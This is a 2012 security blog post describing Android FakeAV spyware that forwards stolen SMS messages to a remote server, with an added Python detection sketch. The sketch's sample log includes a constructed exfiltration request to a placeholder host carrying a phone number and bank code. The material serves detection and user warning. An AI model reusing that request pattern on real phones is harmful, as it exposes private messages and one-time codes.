June 15, 2012 By Nathan Collier

FakeAV for Android! There you are!

Every superhero has an arch-nemesis. For a lot of threat researchers, including myself, Rogue Security Products, better known as FakeAV, are theirs. Back in the day when I was primarily a PC malware fighter, FakeAV was a prevalent threat that was always coming up with new ways to infect users nearly every other day. I knew it was only a matter of time before the same malware authors would turn to mobile. I am afraid those days are upon us. How could I ever forget such an identifiable logo:

“Android Security Suite Premium”… yeah, right! This spy, which is being called Android.FakeSecSuit, retrieves incoming SMS messages, extracts the phone number and message, and then sends the stolen info off:

As you can see in the GET command from the PCAP, highlighted in blue is the phone number and message I sent to my test phone now being sent off to a site.
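A detection sketch for the traffic pattern described above, added here as an example and not taken from the original post or from Webroot's tooling: it flags GET requests whose query string carries a phone number alongside free text. The log lines, host names and parameter names are constructed, since the sample's actual URL and parameters are not reproduced on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed proxy-log lines; hosts and parameter names are placeholders.
SAMPLE_LOG = [
    "GET http://collector.example/recv.php?from=%2B15555550123&text=Your+bank+code+is+482913 HTTP/1.1",
    "GET http://cdn.example/img/logo.png?v=3 HTTP/1.1",
    "GET http://shop.example/search?q=phone+case&page=2 HTTP/1.1",
    "POST http://api.example/login HTTP/1.1",
]

# A whole parameter value that is 7-15 digits with an optional leading '+'.
PHONE_RE = re.compile(r"^\+?\d{7,15}$")


def normalize(value):
    """Strip separators so '+1 555-555-0123' and '15555550123' compare alike."""
    return value.replace("-", "").replace(" ", "")


def looks_like_sms_exfil(line):
    """Return (phone, message) when a GET carries a phone number plus free text."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    # parse_qsl URL-decodes values, so %2B becomes '+' and '+' becomes a space.
    params = parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True)
    phone = next((v for _, v in params if PHONE_RE.match(normalize(v))), None)
    if phone is None:
        return None
    # Free text: a different parameter holding at least two words.
    text = next((v for _, v in params if v != phone and len(v.split()) >= 2), None)
    return (phone, text) if text else None


def scan(lines):
    """Return (log line, (phone, message)) for every suspicious request."""
    return [(line, hit) for line in lines if (hit := looks_like_sms_exfil(line))]


if __name__ == "__main__":
    for line, (phone, text) in scan(SAMPLE_LOG):
        print(f"possible SMS forwarding: phone={phone!r} text={text!r}\n  {line}")
```

This is a heuristic for triage: it only sees cleartext HTTP, and legitimate SMS-gateway or click-to-call services can match the same shape, so hits should be correlated with the device and the app that made the request.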

Now that the developers of the popular FakeAV malware have entered the mobile world, expect to see a lot more variations of this… and if they follow the same pattern as they did in the PC world, I mean A LOT! We are seeing it in Torrents and/or alternative markets. Remember, when downloading Android apps, choose them wisely and download from a trusted source. Check reviews, research the developer and verify permissions requested before downloading. And of course, scan with Webroot SecureAnywhere Mobile.
